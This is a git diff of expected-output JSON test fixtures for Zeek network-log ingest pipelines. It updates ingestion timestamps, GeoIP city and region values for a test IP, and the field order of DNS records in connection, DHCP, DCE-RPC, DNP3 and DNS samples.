@@ -301,7 +301,7 @@ "ip": "192.168.2.205" }, "event": { - "ingested": "2021-12-09T13:50:56.388724100Z", + "ingested": "2021-12-14T14:59:07.719087140Z", "original": "{\"ts\":1551399000.57855,\"uid\":\"Cc6NJ3GRlfjE44I3h\",\"id.orig_h\":\"192.168.2.205\",\"id.orig_p\":3,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":3,\"proto\":\"icmp\",\"conn_state\":\"OTH\",\"local_orig\":false,\"local_resp\":false,\"missed_bytes\":0,\"orig_pkts\":1,\"orig_ip_bytes\":107,\"resp_pkts\":0,\"resp_ip_bytes\":0,\"tunnel_parents\":[]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -339,14 +339,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -380,7 +380,7 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-12-09T13:50:56.388729900Z", + "ingested": "2021-12-14T14:59:07.719087516Z", "original": "{\"ts\":1617062400.404645,\"uid\":\"CCicIg43lOtCQOxXnb\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":56190,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":443,\"proto\":\"tcp\",\"conn_state\":\"OTH\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"C\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":0,\"resp_ip_bytes\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -418,14 +418,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -460,7 +460,7 @@ }, "event": { "duration": 103708982, - "ingested": "2021-12-09T13:50:56.388735500Z", + "ingested": "2021-12-14T14:59:07.719087917Z", "original": "{\"ts\":1617062100.419397,\"uid\":\"C52mXBCPJ4pPGkhr1\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":60810,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":443,\"proto\":\"tcp\",\"duration\":0.10370898246765137,\"orig_bytes\":0,\"resp_bytes\":5854,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"^hCcdafA\",\"orig_pkts\":1,\"orig_ip_bytes\":52,\"resp_pkts\":4,\"resp_ip_bytes\":267}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -498,14 +498,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -540,7 +540,7 @@ }, "event": { "duration": 104128838, - "ingested": "2021-12-09T13:50:56.388741200Z", + "ingested": "2021-12-14T14:59:07.719090564Z", "original": "{\"ts\":1617062100.419603,\"uid\":\"CTzCky2CyLT5JJvHck\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":60804,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":443,\"proto\":\"tcp\",\"duration\":0.10412883758544922,\"orig_bytes\":0,\"resp_bytes\":5854,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"^hCcdafA\",\"orig_pkts\":1,\"orig_ip_bytes\":52,\"resp_pkts\":4,\"resp_ip_bytes\":267}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -578,14 +578,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -620,7 +620,7 @@ }, "event": { "duration": 104333878, - "ingested": "2021-12-09T13:50:56.388746800Z", + "ingested": "2021-12-14T14:59:07.719090943Z", "original": "{\"ts\":1617062100.419826,\"uid\":\"CIkS28PDxqQnN49m2\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":60802,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":443,\"proto\":\"tcp\",\"duration\":0.10433387756347656,\"orig_bytes\":0,\"resp_bytes\":5854,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"^hCcdafA\",\"orig_pkts\":1,\"orig_ip_bytes\":52,\"resp_pkts\":4,\"resp_ip_bytes\":267}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -682,7 +682,7 @@ }, "event": { "duration": 26802063, - "ingested": "2021-12-09T13:50:56.388752500Z", + "ingested": "2021-12-14T14:59:07.719091294Z", "original": "{\"ts\":1617062390.563187,\"uid\":\"CezEGe4jeLNkayV976\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":38948,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.02680206298828125,\"orig_bytes\":0,\"resp_bytes\":241,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Cd\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":1,\"resp_ip_bytes\":269}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -745,7 +745,7 @@ }, "event": { "duration": 25056124, - "ingested": "2021-12-09T13:50:56.388758200Z", + "ingested": "2021-12-14T14:59:07.719091659Z", "original": "{\"ts\":1617062390.563442,\"uid\":\"CKSr3w18mmW6t7bXC4\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":40080,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.025056123733520509,\"orig_bytes\":0,\"resp_bytes\":276,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Cd\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":1,\"resp_ip_bytes\":304}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -808,7 +808,7 @@ }, "event": { "duration": 3319979, - "ingested": "2021-12-09T13:50:56.388762200Z", + "ingested": "2021-12-14T14:59:07.719092014Z", "original": "{\"ts\":1617062390.667048,\"uid\":\"CGUiHy4kLIF2ml95eg\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":41407,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.003319978713989258,\"orig_bytes\":0,\"resp_bytes\":133,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Cd\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":1,\"resp_ip_bytes\":161}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -871,7 +871,7 @@ }, "event": { "duration": 1111984, - "ingested": "2021-12-09T13:50:56.388767100Z", + "ingested": "2021-12-14T14:59:07.719092573Z", "original": "{\"ts\":1617062390.698943,\"uid\":\"CAOZZi4Qrio7gUVgVc\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":50487,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.0011119842529296876,\"orig_bytes\":0,\"resp_bytes\":202,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Cd\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":1,\"resp_ip_bytes\":230}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -934,7 +934,7 @@ }, "event": { "duration": 908852, - "ingested": "2021-12-09T13:50:56.388772200Z", + "ingested": "2021-12-14T14:59:07.719092936Z", "original": "{\"ts\":1617062390.699227,\"uid\":\"Chx5fs3xQ5ALB72i4e\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":49647,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.0009088516235351563,\"orig_bytes\":0,\"resp_bytes\":145,\"conn_state\":\"SHR\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Cd\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":1,\"resp_ip_bytes\":173}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -996,7 +996,7 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-12-09T13:50:56.388777Z", + "ingested": "2021-12-14T14:59:07.719093278Z", "original": "{\"ts\":1617062400.703865,\"uid\":\"C3pPjh1YRYcVDiZD3\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":44944,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":80,\"proto\":\"tcp\",\"conn_state\":\"OTH\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"C\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":0,\"resp_ip_bytes\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1057,7 +1057,7 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-12-09T13:50:56.388780800Z", + "ingested": "2021-12-14T14:59:07.719093624Z", "original": "{\"ts\":1617062400.703851,\"uid\":\"ChUxTmYLG37oO5qUb\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":44942,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":80,\"proto\":\"tcp\",\"conn_state\":\"OTH\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"C\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":0,\"resp_ip_bytes\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -1118,7 +1118,7 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-12-09T13:50:56.388785300Z", + "ingested": "2021-12-14T14:59:07.719093964Z", "original": "{\"ts\":1617062400.704467,\"uid\":\"CpeAOT3B11CTXJgzw2\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":44946,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":80,\"proto\":\"tcp\",\"conn_state\":\"OTH\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"C\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":0,\"resp_ip_bytes\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1151,14 +1151,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -1187,14 +1187,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -1236,7 +1236,7 @@ }, "event": { "duration": 76967000, - "ingested": "2021-12-09T13:50:56.388791300Z", + "ingested": "2021-12-14T14:59:07.719094441Z", "original": "{\"ts\":1547188417.857497,\"uid\":\"CAcJw21BbVedgFnYH5\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":38334,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.076967,\"orig_bytes\":75,\"resp_bytes\":178,\"conn_state\":\"SF\",\"local_orig\":false,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Dd\",\"orig_pkts\":1,\"orig_ip_bytes\":103,\"resp_pkts\":1,\"resp_ip_bytes\":206,\"tunnel_parents\":[]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1286,7 +1286,7 @@ "ip": "10.0.2.15" }, "event": { - "ingested": "2021-12-09T13:50:56.388795400Z", + "ingested": "2021-12-14T14:59:07.719094822Z", "original": "{\"ts\":\"2021-06-09T20:55:13.160328Z\",\"uid\":\"C2KP1V3alRLoxl4JB9\",\"id.orig_h\":\"10.0.2.15\",\"id.orig_p\":46408,\"id.resp_h\":\"172.16.9.68\",\"id.resp_p\":80,\"proto\":\"tcp\",\"conn_state\":\"OTH\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"C\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":0,\"resp_ip_bytes\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/dce_rpc/_dev/test/pipeline/test-dce-rpc.log-expected.json b/packages/zeek/data_stream/dce_rpc/_dev/test/pipeline/test-dce-rpc.log-expected.json index a8a9d8bf689..a7284a3366e 100644 --- a/packages/zeek/data_stream/dce_rpc/_dev/test/pipeline/test-dce-rpc.log-expected.json +++ b/packages/zeek/data_stream/dce_rpc/_dev/test/pipeline/test-dce-rpc.log-expected.json 
@@ -31,7 +31,7 @@ "ip": "172.16.133.6" }, "event": { - "ingested": "2021-12-09T13:50:58.323937300Z", + "ingested": "2021-12-14T14:59:09.769997634Z", "original": "{\"ts\":1361916332.298338,\"uid\":\"CsNHVHa1lzFtvJzT8\",\"id.orig_h\":\"172.16.133.6\",\"id.orig_p\":1728,\"id.resp_h\":\"172.16.128.202\",\"id.resp_p\":445,\"rtt\":0.09211,\"named_pipe\":\"\\u005cPIPE\\u005cbrowser\",\"endpoint\":\"browser\",\"operation\":\"BrowserrQueryOtherDomains\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -102,7 +102,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:50:58.323944800Z", + "ingested": "2021-12-14T14:59:09.770000842Z", "original": "{\"ts\":1361916332.298338,\"uid\":\"CsNHVHa1lzFtvJzT8\",\"id.orig_h\":\"172.16.133.6\",\"id.orig_p\":1728,\"id.resp_h\":\"172.16.128.202\",\"id.resp_p\":445,\"rtt\":0.09211,\"named_pipe\":\"\\u005cPIPE\\u005cbrowser\",\"endpoint\":\"browser\",\"operation\":\"BrowserrQueryOtherDomains\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/dhcp/_dev/test/pipeline/test-dhcp.log-expected.json b/packages/zeek/data_stream/dhcp/_dev/test/pipeline/test-dhcp.log-expected.json index 8c7578663fc..4ae179d0cee 100644 --- a/packages/zeek/data_stream/dhcp/_dev/test/pipeline/test-dhcp.log-expected.json +++ b/packages/zeek/data_stream/dhcp/_dev/test/pipeline/test-dhcp.log-expected.json 
@@ -63,7 +63,7 @@ "address": "192.168.199.132" }, "event": { - "ingested": "2021-12-09T13:50:58.676860500Z", + "ingested": "2021-12-14T14:59:10.103460884Z", "original": "{\"ts\":1476605498.771847,\"uids\":[\"CmWOt6VWaNGqXYcH6\",\"CLObLo4YHn0u23Tp8a\"],\"client_addr\":\"192.168.199.132\",\"server_addr\":\"192.168.199.254\",\"mac\":\"00:0c:29:03:df:ad\",\"host_name\":\"DESKTOP-2AEFM7G\",\"client_fqdn\":\"DESKTOP-2AEFM7G\",\"domain\":\"localdomain\",\"requested_addr\":\"192.168.199.132\",\"assigned_addr\":\"192.168.199.132\",\"lease_time\":1800.0,\"msg_types\":[\"REQUEST\",\"ACK\"],\"duration\":0.000161}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -139,7 +139,7 @@ "address": "10.156.0.2" }, "event": { - "ingested": "2021-12-09T13:50:58.676864400Z", + "ingested": "2021-12-14T14:59:10.103463757Z", "original": "{\"ts\":1617088722.072416,\"uids\":[\"Ck0tsG4wsJxI3lIEZ\"],\"client_addr\":\"10.156.0.2\",\"server_addr\":\"169.254.169.254\",\"mac\":\"42:01:0a:9c:00:02\",\"domain\":\"c.elastic-sa.internal\",\"assigned_addr\":\"10.156.0.2\",\"lease_time\":86400.0,\"msg_types\":[\"ACK\"],\"duration\":0.0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -227,7 +227,7 @@ "address": "192.168.199.132" }, "event": { - "ingested": "2021-12-09T13:50:58.676870800Z", + "ingested": "2021-12-14T14:59:10.103464232Z", "original": "{\"ts\":1476605498.771847,\"uids\":[\"CmWOt6VWaNGqXYcH6\",\"CLObLo4YHn0u23Tp8a\"],\"client_addr\":\"192.168.199.132\",\"server_addr\":\"192.168.199.254\",\"mac\":\"00:0c:29:03:df:ad\",\"host_name\":\"DESKTOP-2AEFM7G\",\"client_fqdn\":\"DESKTOP-2AEFM7G\",\"domain\":\"localdomain\",\"requested_addr\":\"192.168.199.132\",\"assigned_addr\":\"192.168.199.132\",\"lease_time\":1800.0,\"msg_types\":[\"REQUEST\",\"ACK\"],\"duration\":0.000161}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
diff --git a/packages/zeek/data_stream/dnp3/_dev/test/pipeline/test-dnp3.log-expected.json b/packages/zeek/data_stream/dnp3/_dev/test/pipeline/test-dnp3.log-expected.json index d9c25a2dd6d..4a0ee24dad2 100644 --- a/packages/zeek/data_stream/dnp3/_dev/test/pipeline/test-dnp3.log-expected.json +++ b/packages/zeek/data_stream/dnp3/_dev/test/pipeline/test-dnp3.log-expected.json @@ -29,7 +29,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-12-09T13:50:59.129296Z", + "ingested": "2021-12-14T14:59:10.523928699Z", "original": "{\"ts\":1227729908.705944,\"uid\":\"CQV6tj1w1t4WzQpHoe\",\"id.orig_h\":\"127.0.0.1\",\"id.orig_p\":42942,\"id.resp_h\":\"127.0.0.1\",\"id.resp_p\":20000,\"fc_request\":\"READ\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -98,7 +98,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:50:59.129299400Z", + "ingested": "2021-12-14T14:59:10.523930746Z", "original": "{\"ts\":1227729908.705944,\"uid\":\"CQV6tj1w1t4WzQpHoe\",\"id.orig_h\":\"127.0.0.1\",\"id.orig_p\":42942,\"id.resp_h\":\"127.0.0.1\",\"id.resp_p\":20000,\"fc_request\":\"READ\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/dns/_dev/test/pipeline/test-dns.log-expected.json b/packages/zeek/data_stream/dns/_dev/test/pipeline/test-dns.log-expected.json index 4f55d3cd81c..3beb189043d 100644 --- a/packages/zeek/data_stream/dns/_dev/test/pipeline/test-dns.log-expected.json +++ b/packages/zeek/data_stream/dns/_dev/test/pipeline/test-dns.log-expected.json @@ -1,6 +1,16 @@ { "expected": [ { + "@timestamp": "2019-01-11T06:33:35.857Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.86.167", + "192.168.86.1" + ] + }, "destination": { "port": 53, "address": "192.168.86.1", 
@@ -74,27 +84,9 @@ "address": "192.168.86.167", "ip": "192.168.86.167" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "community_id": "1:Z26DBGVYoBKQ1FT6qfPaAqBnJik=", - "transport": "udp" - }, - "@timestamp": "2019-01-11T06:33:35.857Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.86.167", - "192.168.86.1" - ] - }, "event": { "duration": 7.6967E7, - "ingested": "2021-12-09T13:50:59.483477600Z", + "ingested": "2021-12-14T14:59:10.859211565Z", "original": "{\"ts\":1547188415.857497,\"uid\":\"CAcJw21BbVedgFnYH3\",\"id.orig_h\":\"192.168.86.167\",\"id.orig_p\":38339,\"id.resp_h\":\"192.168.86.1\",\"id.resp_p\":53,\"proto\":\"udp\",\"trans_id\":15209,\"rtt\":0.076967,\"query\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"qclass\":1,\"qclass_name\":\"C_INTERNET\",\"qtype\":1,\"qtype_name\":\"A\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":false,\"TC\":false,\"RD\":true,\"RA\":true,\"Z\":0,\"answers\":[\"proxy-production-us-west1.gcp.cloud.es.io\",\"proxy-production-us-west1-v1-009.gcp.cloud.es.io\",\"89.160.20.156\"],\"TTLs\":[119.0,119.0,59.0],\"rejected\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -108,9 +100,27 @@ "info" ], "outcome": "success" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "community_id": "1:Z26DBGVYoBKQ1FT6qfPaAqBnJik=", + "transport": "udp" } }, { + "@timestamp": "2019-08-29T16:23:50.680Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "fe80::4ef:15cf:769f:ff21", + "ff02::fb" + ] + }, "destination": { "port": 5353, "address": "ff02::fb", 
@@ -145,26 +155,8 @@ "address": "fe80::4ef:15cf:769f:ff21", "ip": "fe80::4ef:15cf:769f:ff21" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "community_id": "1:Jq0sRtlGSMjsvMBE1ZYybbR2tI0=", - "transport": "udp" - }, - "@timestamp": "2019-08-29T16:23:50.680Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "fe80::4ef:15cf:769f:ff21", - "ff02::fb" - ] - }, "event": { - "ingested": "2021-12-09T13:50:59.483485800Z", + "ingested": "2021-12-14T14:59:10.859214240Z", "original": "{\"ts\":1567095830.680046,\"uid\":\"C19a1k4lTv46YMbeOk\",\"id.orig_h\":\"fe80::4ef:15cf:769f:ff21\",\"id.orig_p\":5353,\"id.resp_h\":\"ff02::fb\",\"id.resp_p\":5353,\"proto\":\"udp\",\"trans_id\":0,\"query\":\"_googlecast._tcp.local\",\"qclass\":1,\"qclass_name\":\"C_INTERNET\",\"qtype\":12,\"qtype_name\":\"PTR\",\"AA\":false,\"TC\":false,\"RD\":false,\"RA\":false,\"Z\":0,\"rejected\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -178,9 +170,27 @@ "info" ], "outcome": "success" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "community_id": "1:Jq0sRtlGSMjsvMBE1ZYybbR2tI0=", + "transport": "udp" } }, { + "@timestamp": "2019-08-29T16:23:50.734Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.86.237", + "224.0.0.251" + ] + }, "destination": { "port": 5353, "address": "224.0.0.251", 
@@ -226,26 +236,8 @@ "address": "192.168.86.237", "ip": "192.168.86.237" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "community_id": "1:QIR5YXlirWwWA18ZyY/RnvQoaic=", - "transport": "udp" - }, - "@timestamp": "2019-08-29T16:23:50.734Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.86.237", - "224.0.0.251" - ] - }, "event": { - "ingested": "2021-12-09T13:50:59.483491400Z", + "ingested": "2021-12-14T14:59:10.859214676Z", "original": "{\"ts\":1567095830.734329,\"uid\":\"CdiVAw7jJw6gsX5H\",\"id.orig_h\":\"192.168.86.237\",\"id.orig_p\":5353,\"id.resp_h\":\"224.0.0.251\",\"id.resp_p\":5353,\"proto\":\"udp\",\"trans_id\":0,\"query\":\"_googlecast._tcp.local\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":true,\"TC\":false,\"RD\":false,\"RA\":false,\"Z\":0,\"answers\":[\"bravia-4k-gb-5c89f865c9d569ab338815b35e3acc56._googlecast._tcp.local\"],\"TTLs\":[120.0],\"rejected\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -259,9 +251,27 @@ "info" ], "outcome": "success" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "community_id": "1:QIR5YXlirWwWA18ZyY/RnvQoaic=", + "transport": "udp" } }, { + "@timestamp": "2021-03-30T11:59:52.091Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.156.0.2", + "169.254.169.254" + ] + }, "destination": { "port": 53, "address": "169.254.169.254", 
@@ -327,26 +337,8 @@ "address": "10.156.0.2", "ip": "10.156.0.2" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "community_id": "1:Mj0uP/7Ctd+meHQL8iXVrCNL2ZE=", - "transport": "udp" - }, - "@timestamp": "2021-03-30T11:59:52.091Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.156.0.2", - "169.254.169.254" - ] - }, "event": { - "ingested": "2021-12-09T13:50:59.483496800Z", + "ingested": "2021-12-14T14:59:10.859215061Z", "original": "{\"ts\":1617105592.091052,\"uid\":\"CpwXdW4LQaJkaIgpk\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":33438,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"trans_id\":58036,\"query\":\"manage.office.com\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":false,\"TC\":false,\"RD\":false,\"RA\":true,\"Z\":0,\"answers\":[\"manage.office.com.trafficmanager.net\",\"o365adtapiproddeu001.cloudapp.net\",\"89.160.20.156\"],\"TTLs\":[13.0,18.0,8.0],\"rejected\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -360,9 +352,27 @@ "info" ], "outcome": "success" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "community_id": "1:Mj0uP/7Ctd+meHQL8iXVrCNL2ZE=", + "transport": "udp" } }, { + "@timestamp": "2021-03-30T11:59:52.973Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.156.0.2", + "169.254.169.254" + ] + }, "destination": { "port": 53, "address": "169.254.169.254", 
@@ -426,26 +436,8 @@ "address": "10.156.0.2", "ip": "10.156.0.2" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "community_id": "1:0B1VNLwfmVgcZUY1gi6ZVuS8YZE=", - "transport": "udp" - }, - "@timestamp": "2021-03-30T11:59:52.973Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.156.0.2", - "169.254.169.254" - ] - }, "event": { - "ingested": "2021-12-09T13:50:59.483502200Z", + "ingested": "2021-12-14T14:59:10.859215457Z", "original": "{\"ts\":1617105592.973919,\"uid\":\"CO5TE748RoJEZuOThl\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":60444,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"trans_id\":35744,\"query\":\"login.microsoftonline.com\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":false,\"TC\":false,\"RD\":false,\"RA\":true,\"Z\":0,\"answers\":[\"a.privatelink.msidentity.com\",\"prda.aadg.msidentity.com\",\"www.tm.a.prd.aadg.akadns.net\"],\"TTLs\":[296.0,287.0,287.0],\"rejected\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -459,9 +451,27 @@ "info" ], "outcome": "success" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "community_id": "1:0B1VNLwfmVgcZUY1gi6ZVuS8YZE=", + "transport": "udp" } }, { + "@timestamp": "2021-03-30T11:59:52.974Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.156.0.2", + "169.254.169.254" + ] + }, "destination": { "port": 53, "address": "169.254.169.254", 
@@ -582,26 +592,8 @@ "address": "10.156.0.2", "ip": "10.156.0.2" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "community_id": "1:6FS8lMU9Y2cS38F7kmqpZmgcpbs=", - "transport": "udp" - }, - "@timestamp": "2021-03-30T11:59:52.974Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.156.0.2", - "169.254.169.254" - ] - }, "event": { - "ingested": "2021-12-09T13:50:59.483507600Z", + "ingested": "2021-12-14T14:59:10.859215827Z", "original": 